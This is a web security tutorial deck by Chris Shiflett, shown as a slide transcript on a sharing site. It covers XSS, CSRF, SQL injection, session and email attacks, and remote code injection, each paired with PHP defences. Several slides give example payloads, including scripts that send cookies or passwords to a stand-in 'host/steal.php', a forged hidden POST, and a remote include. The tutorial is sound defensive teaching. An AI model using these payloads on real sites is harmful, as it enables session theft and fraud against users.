Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Evolution of Web Security

Chris Shiflett
September 26, 2011
Programming
10
1.3k

Evolution of Web Security

This is a multi-faceted tutorial that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I demonstrate how traditional exploits are being combined together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.

Chris Shiflett

September 26, 2011
Tweet

More Decks by Chris Shiflett

See All by Chris Shiflett
Understanding People
shiflett
2
2.3k

Other Decks in Programming

See All in Programming
CircleCIを活用して AWSへの継続的デリバリーを 実践する
coconala_engineer
1
230
脱・初心者!脱・マネコン!AWS CDKを使ってみませんか!?
har1101
0
300
CA.swift19 恋するAIアプリ開発の裏側
oskmr
0
340
二郎系ラーメンのコールで学ぶ AST 解析
memory1994
PRO
7
1.7k
HUIT新歓2024「競技プログラミング、やってみませんか?」
slephy2784
1
250
0→1と1→10の狭間で Javaという技術選定を振り返る/Reflecting on the Decision to Choose Java Between Scaling from 0 to 1 and 1 to 10
jaguar_imo
2
370
FigmaとPHPで作る1ミリたりとも表示崩れしない最強の帳票印刷ソリューション
ttskch
39
18k
品質とスピードを両立: TypeScriptの柔軟な型システムをバックエンドで活用する
kosui
8
2.2k
Rubyでたのしむクリエイティブコーディング/Enjoy Creative coding with Ruby
chobishiba
1
160
StreamlitとTerraformでデータカタログを作った話
gussan0223
0
300
データアナリストが行うDatabricksを活用したETLの自動化事例
shinoa
0
250
Ruby Function Composition
bkuhlmann
1
330

Featured

See All Featured
Automating Front-end Workflow
addyosmani
1355
200k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
124
32k
Keith and Marios Guide to Fast Websites
keithpitt
408
22k
Designing for Performance
lara
601
67k
Documentation Writing (for coders)
carmenintech
59
3.9k
Atom: Resistance is Futile
akmur
258
25k
Typedesign – Prime Four
hannesfritz
36
2.1k
For a Future-Friendly Web
brad_frost
171
8.9k
RailsConf 2023
tenderlove
2
530
Optimising Largest Contentful Paint
csswizardry
7
2.3k
Statistics for Hackers
jakevdp
789
220k
GitHub's CSS Performance
jonrohan
1023
450k

Transcript

  1. Evolution of Web Security Chris Shiflett @shiflett ▪ shiflett.org

  2. Who am I? Web craftsman from Brooklyn, NY, and founding

    member of Analog, a web design & development co-operative.

  3. 1. Fundamentals

  4. Defense in depth — Redundant safeguards are valuable. Least privilege

    — Grant as little freedom as possible. Least complicated — Complexity breeds mistakes. Three Principles

  5. Filter input. — Ensure data coming in is valid. Escape

    output. — Ensure data going out is not misinterpreted. Two Practices

  6. Application Escape Filter Filter input. Escape output.

  7. <?php $clean = array(); if (ctype_alpha($_POST['name'])) { $clean['name'] = $_POST['name'];

    } else { /* Error */ } ?>

  8. <?php $clean = array(); switch ($_POST['color']) { case 'red': case

    'green': case 'blue': $clean['color'] = $_POST['color']; break; default: /* Error */ break; } ?>

  9. <?php $clean = array(); $colors = array('red', 'green', 'blue'); if

    (in_array($_POST['color'], $colors)) { $clean['color'] = $_POST['color']; } else { /* Error */ } ?>

  10. <?php $clean = array(); $colors = array(); $colors['red'] = '';

    $colors['green'] = ''; $colors['blue'] = ''; if (isset($colors[$_POST['color']])) { $clean['color'] = $_POST['color']; } else { /* Error */ } ?>

  11. <?php $clean = array(); if (preg_match('/^\d{5}$/', $_POST['zip'])) { $clean['zip'] =

    $_POST['zip']; } else { /* Error */ } ?>

  12. <?php /* Content-Type: text/html; charset=UTF-8' */ $html = array(); $html['user']

    = htmlentities($clean['user'], ENT_QUOTES, 'UTF-8'); echo "<p>Welcome, {$html['user']}.</p>"; ?>
  13. None

  14. Cross-Site Scripting Cross-Site Request Forgeries SQL Injection Session Fixation Session

    Hijacking Email Injection Remote Code Injection Exploits

  15. Victim Attacker Cross-Site Scripting Target XSS HTML XSS 1 2

  16. echo $_GET['user']; http://host/foo.php?user=%3Cscript%3E… echo '<script>…';

  17. <script> document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script> Steal Cookies

  18. <script> document.forms[0].action = 'http://host/steal.php'; </script> Steal Passwords

  19. <form name="steal" action="http://host/steal.php"> <input type="text" name="username" style="display: none" /> <input

    type="password" name="password" style="display: none" /> <input type="image" src="image.png" /> </form> Steal Saved Passwords

  20. <script src="http://host/evil.js"></script> Short & Simple

  21. $string = "<script>alert('XSS');</script>"; $string = mb_convert_encoding($string, 'UTF-7'); echo htmlentities($string); Character

    Encoding Google XSS Example http://shiflett.org/blog/2005/dec/google-xss-example

  22. FIEO. Use valid HTML. — http://validator.w3.org/ Use existing solutions. —

    PHP developers, use htmlentities() or htmlspecialchars(). — Make sure you indicate the character encoding! Need to allow HTML? — Use HTML Purifier, even if you’re not using PHP: http://htmlpurifier.org/ Stop It!

  23. Target Attacker Cross-Site Request Forgeries Victim ? CSRF 1 2

  24. Because the attack is carried out by the victim, CSRF

    can bypass: — HTTP auth — Session-based auth — Firewalls — &c. CSRF

  25. Buy <form action="buy.php" method="post"> <input type="hidden" name="isbn" value="059600656X" /> <input

    type="submit" value="Buy" /> </form> POST /buy.php HTTP/1.1 Host: host Cookie: PHPSESSID=1234 Content-Type: application/x-www-form-urlencoded Content-Length: 15 isbn=059600656X

  26. Forging GET GET /buy.php?isbn=059600656X HTTP/1.1 Host: host Cookie: PHPSESSID=1234 <img

    src="http://host/buy.php?isbn=059600656X" />

  27. <iframe style="visibility: hidden" name="secret"></iframe> <form name="buy" action="http://host/buy.php" method="post" target="secret"> <input

    type="hidden" name="isbn" value="059600656X" /> </form> <script type="text/javascript">document.buy.submit();</script> Forging POST POST /buy.php HTTP/1.1 Host: host Cookie: PHPSESSID=1234 Content-Type: application/x-www-form-urlencoded Content-Length: 15 isbn=059600656X

  28. Digg (Fixed) http://4diggers.blogspot.com/ Amazon (Fixed?) http://shiflett.org/amazon.php CSRF Exploits

  29. <script> new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script> Steal Cookies

    (Improved)

  30. $token = md5(uniqid(rand(), TRUE)); $_SESSION['token'] = $token; $html['token'] = htmlentities($token,

    ENT_QUOTES, 'UTF-8'); Stop It! <input type="hidden" name="token" value="<?php echo $html['token']; ?>" />

  31. Database Attacker SQL Injection Target SQL SQL SQL 1 2

  32. SELECT count(*) FROM users WHERE username = '{$_POST['username']}' AND password

    = '…' chris' /* SELECT count(*) FROM users WHERE username = 'chris' /*' AND password = '…'

  33. FIEO. Use prepared statements. — PHP developers, use PDO. Stop

    It! addslashes() Versus mysql_real_escape_string() http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

  34. http://host/login.php?PHPSESSID=1234 Session Fixation

  35. Regenerate the session identifier. — PHP developers, session_regenerate_id(TRUE). Do this

    whenever the privilege level changes. Stop It!

  36. Attacker impersonates a victim. In PHP, by default, only requires

    a valid session identifier. Session identifier obtained using: — Prediction — Capture — Fixation Session Hijacking

  37. Understand how sessions work. Minimize session identifier exposure. — SSL

    — Separate domain for embedded resources Trending — https://panopticlick.eff.org/ — More on this later… Stop It!

  38. [email protected]\r\nBcc: [email protected]\r\nBcc: … To: [email protected] Subject: Feedback From: [email protected] Bcc:

    [email protected] Bcc: … Email Injection mail('[email protected]', 'Feedback', '...', "From: {$_POST['email']}");

  39. FIEO. — http://iamcal.com/publish/articles/php/parsing_email — PHP developers, use ctype_print() as defense

    in depth. Stop It!

  40. Target Attacker Remote Code Injection

  41. include "{$_COOKIE['type']}.php"; Cookie: type=http://host/inject.inc? include "http://host/inject.inc?.php";

  42. This example exploits allow_url_fopen. PHP 5 has allow_url_include. — By

    default, allow_url_include is disabled. Remote Code Injection

  43. include "php://input"; POST /script.php?type=php://input%00 HTTP/1.1 Host: host Content-Type: application/x-www-form-urlencoded Content-Length:

    ? ? include "{$_GET['type']}.php";

  44. FIEO. — If at all possible, use a white list.

    Stop It!

  45. 2. Emerging Trends

  46. Ajax “The name is shorthand for Asynchronous JavaScript + XML,

    and it represents a fundamental shift in what’s possible on the Web.” — Jesse James Garrett

  47. Ajax “Client-side techniques & technologies that allow two-way communication between

    the client and the server without reloading the page.”

  48. Target Victim JS 1. XMLHttpRequest 2. HTML form + victim’s

    token 3. XMLHttpRequest + victim’s token Cross-Domain Ajax

  49. Target Victim XSS + Ajax + CSRF XSS 1. XMLHttpRequest

    2. HTML form + victim’s token 3. XMLHttpRequest + victim’s token

  50. XSS is a perfect platform for CSRF. CSRF attacks can

    exploit XSS vulnerabilities. Victims can become attackers. Rinse. Repeat. Worms

  51. Browser Hijacking http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking Myspace CSRF and XSS Worm (Samy) http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy

  52. <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> Cross-Domain Ajax Thanks, Flash!

  53. Cross-Domain Ajax domain="*" API domain Vulnerable? No yahoo.com No No

    youtube.com No Yes api.flickr.com No Yes No adobe.com Yes No

  54. Target Attacker JavaScript Hijacking Victim ? CSRF 1 2 3

    4

  55. <script src="http://host/json.php"></script> [{"email": "[email protected]"}] JavaScript Hijacking Demo http://mochikit.com/fortify_fud/

  56. JavaScript Hijacking “If you audit your application for CSRF flaws,

    you’ve defeated this attack. Moreover, the well-known, pre-existing exploits for CSRF are actually worse than this attack.” — Thomas Ptacek

  57. 3. Ideas for the Future

  58. Panopticlick https://panopticlick.eff.org/ Trending “When you visit a web site, you

    are allowing that site to access a lot of information about your computer’s configuration. Combined, this information can create a kind of fingerprint — a signature that could be used to identify you and your computer.”

  59. Trending “Not the intent, but Panopticlick from @eff would be

    useful for preventing session hijacking.” — http://twitter.com/shiflett/status/8562663352

  60. Establish trends to help detect anomalies. Trends can be based

    on identity or behavior. Trending is imperfect; use as defense in depth. Trending

  61. Slides http://shiflett.org/evolution-of-web-security.pdf http://slideshare.net/shiflett

  62. Follow me on Twitter. — @shiflett Comment on my blog.

    — shiflett.org Email me. — chris@shiflett.org Work with me. — analog.coop Feedback?